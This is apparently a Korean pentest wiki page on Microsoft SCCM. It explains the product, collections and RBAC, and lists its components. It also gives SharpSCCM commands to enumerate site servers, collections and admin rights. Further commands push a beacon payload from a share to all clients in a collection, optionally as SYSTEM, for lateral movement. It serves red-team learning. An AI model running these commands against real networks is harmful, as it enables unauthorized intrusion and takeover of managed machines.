SCCM

Microsoft Configuration Manager는 Windows 컴퓨터를 관리하는 목적으로 제공되는 소프트웨어입니다. 원래 이름은 Systems Management Server에서 시작되었지만 System Center Configuration Manager로 바뀐 이후부터는 SCCM이라는 이름으로 불립니다. SCCM을 통해서 보안 담당자는 직원들을 위한 소프트웨어 및 애플리케이션 배포, 업데이트, 컴플라이언스 구성 및 보고 등의 시스템 관리 작업을 중앙에서 관리할 수 있습니다.

SCCM에서는 서버에서 준비한 리소스를 클라이언트에게 배포할 때 컬렉션 단위로 지정합니다. 기본적으로 구성된 컬렉션도 있으며 사용자가 조직, 부서 등을 구분하기 위한 컬렉션을 생성하는 것도 가능합니다. 이런 객체들에 대한 접근 제어는 역할 기반(RBAC)에 의해 이뤄지기 때문에, 컬렉션이 실제로 존재하는 것보다 사용자가 확인할 수 있는 컬렉션의 양이 적을 수 있습니다. 기본 값으로 존재하는 SCCM 컬렉션은 읽을 권한이 있지만, 서버에서 생성한 커스텀 컬렉션에 대해 읽기 권한이 없는 사용자가 조회를 시도한다면 권한에 대한 오류 메시지는 나오지 않기 때문에 수집한 컬렉션 정보가 모든 읽기 권한이 있었는지 검증할 필요가 있습니다.

# 사이트 서버 확인
Get-WmiObject -Class SMS_Authority -Namespace root\CCM | select Name, CurrentManagementPoint | fl

# 사이트 서버로 지정된 머신 확인
.\SharpSCCM.exe get site-info -d pentest.wiki --no-banner

# 컬렉션 열거
.\SharpSCCM.exe get collections --no-banner

# 사용자 그룹 권한 열거
.\SharpSCCM.exe get class-instances SMS_Admin --no-banner

# 컬렉션 구성원 열거
.\SharpSCCM.exe get collection-members -n <Collection> --no-banner

제어권을 획득한 시스템에서 SCCM에 대해 Full Administrator 혹은 Application Administrator 권한이 있다면, 클라이언트 에이전트를 통한 애플리케이션 배포 및 실행으로 측면 이동을 할 수 있습니다. 이때 실행하는 프로세스는 명령 대상인 컬렉션에 속해있는 머신에 현재 접속한 사용자 컨텍스트에서 실행됩니다. 만약 머신에 접속한 사용자가 없을 시 명령은 실행되지 않습니다. 하지만 사용자가 로그인 하지 않더라도 System 권한으로 실행하면 시스템 컨텍스트에서 실행되기 때문에 명령 실행이 가능하며, 이때 획득하는 비콘은 System 비콘입니다.

# 공유 폴더에 비콘 페이로드 업로드 후 모든 클라이언트 에이전트에서 원격 명령 실행
.\SharpSCCM.exe exec -n <Collection> -p \\dc-1\software\http_x64.exe --no-banner

# 시스템 컨텍스트에서 원격 명령 실행
.\SharpSCCM.exe exec -n <Collection> -p "C:\Windows\System32\cmd.exe /c start /b \\dc-1\software\http_x64.exe" -s --no-banner

Components

1. 시스템을 관리하고 구성하기 위한 콘솔

2. 구성 데이터를 저장하고 SCCM 콘솔에 대한 엑세스를 제공하는 사이트 서버

3. 관리 대상 장치에서 설치 및 실행하는 클라이언트

4. 관리되는 리소스에 대한 정보를 저장하는 데이터베이스

5. 애플리케이션과 패치 등을 배포하는데 사용되는 배포 지점

6. SCCM 콘솔에 대한 엑세스를 제공하는 관리 지점

7. 관리되는 리소스에 대한 보고서를 생성하는 보고서 서비스

How does SCCM work ?

간단하게 생각했을 때 관리 대상의 컴퓨터에는 클라이언트 에이전트가 설치되어 이를 통해 서버에서 배포하는 리소스를 받을 수 있습니다. 에이전트는 서버와 통신하여 서버는 원격으로 디바이스를 제어하고 모니터링이 가능합니다.

References